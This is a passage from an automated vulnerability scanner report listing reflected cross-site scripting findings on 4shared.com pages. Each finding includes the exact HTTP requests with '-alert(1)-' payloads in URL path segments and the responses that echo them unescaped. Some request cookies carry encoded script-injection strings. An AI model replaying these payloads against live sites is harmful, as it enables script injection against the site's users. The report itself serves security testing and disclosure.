<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.314. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e997"-alert(1)-"7bb2d897bb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise3e997&quot;-alert(1)-&quot;7bb2d897bb0/banners/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3DAF2D9C428EAB31F61D3BF61A35CD60.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:31:54 GMT
Content-Length: 36320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.315. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a805f"-alert(1)-"4c476fd3f21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/bannersa805f&quot;-alert(1)-&quot;4c476fd3f21/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCC54BBB2A80A834314C7F9C9B8CCA67.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:09 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback
...[SNIP]...

1.316. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31ad"-alert(1)-"d183c0a7079 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktopa31ad&quot;-alert(1)-&quot;d183c0a7079/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A9E5C096071D6B340A0CD040F160790B.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:24 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.317. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0759"-alert(1)-"b5db9f6f713 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktop/728x90.jspe0759&quot;-alert(1)-&quot;b5db9f6f713
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78F6ABDF9E1F83884170846AE905EE6D.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:39 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.318. http://www.4shared.com/contact.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /contact.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dabbb"-alert(1)-"c3f9028a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.jspdabbb"-alert(1)-"c3f9028a5f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /contact.jspdabbb&quot;-alert(1)-&quot;c3f9028a5f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7605F5D00D0FE3651D892172B7D724A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/contact.jspdabbb"-alert(1)-"c3f9028a5f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.319. http://www.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1a6"-alert(1)-"93e9e1ca1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /csscf1a6"-alert(1)-"93e9e1ca1ea/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /csscf1a6&quot;-alert(1)-&quot;93e9e1ca1ea/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9945AFA63F6156987186E12CABD47B3D.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:37 GMT
Content-Length: 36846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/csscf1a6"-alert(1)-"93e9e1ca1ea/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.320. http://www.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51356"-alert(1)-"0c3edb7ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css51356"-alert(1)-"0c3edb7ca9f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/common.css51356&quot;-alert(1)-&quot;0c3edb7ca9f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF38715E34696F682B603791528F2490.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:48 GMT
Content-Length: 36833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/common.css51356"-alert(1)-"0c3edb7ca9f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.321. http://www.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17143"-alert(1)-"8e70496ad1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css17143"-alert(1)-"8e70496ad1f/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css17143&quot;-alert(1)-&quot;8e70496ad1f/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C418A6718141B4DED03FB108B759A002.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css17143"-alert(1)-"8e70496ad1f/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.322. http://www.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33c86"-alert(1)-"04029f7d211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css33c86"-alert(1)-"04029f7d211?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/main.css33c86&quot;-alert(1)-&quot;04029f7d211
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC79C3CAAAA22F8BA9BF7E8CB1C3AA7.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.css33c86"-alert(1)-"04029f7d211";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.323. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f987f"-alert(1)-"dff384d2e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssf987f&quot;-alert(1)-&quot;dff384d2e3e/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D3153B42395E4699F91C0059655651A4.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:43 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.324. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c20"-alert(1)-"0b7443b060a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.cssc7c20&quot;-alert(1)-&quot;0b7443b060a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA654DA392D19A26D4D4D21F2FB850BC.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:55 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.325. http://www.4shared.com/desktop/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9b8"-alert(1)-"fce9bca0f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopeb9b8"-alert(1)-"fce9bca0f19/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /desktopeb9b8&quot;-alert(1)-&quot;fce9bca0f19/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C96FBC536CDE4E9B1B430C66668E2CE7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:02 GMT
Connection: close
Content-Length: 36103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktopeb9b8"-alert(1)-"fce9bca0f19/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.326. http://www.4shared.com/enter.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4861a"-alert(1)-"6a1c01b4181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enter.jsp4861a"-alert(1)-"6a1c01b4181 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /enter.jsp4861a&quot;-alert(1)-&quot;6a1c01b4181
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4120E419A42EF4B824AB35C4C8D717A1.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jsp4861a"-alert(1)-"6a1c01b4181";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
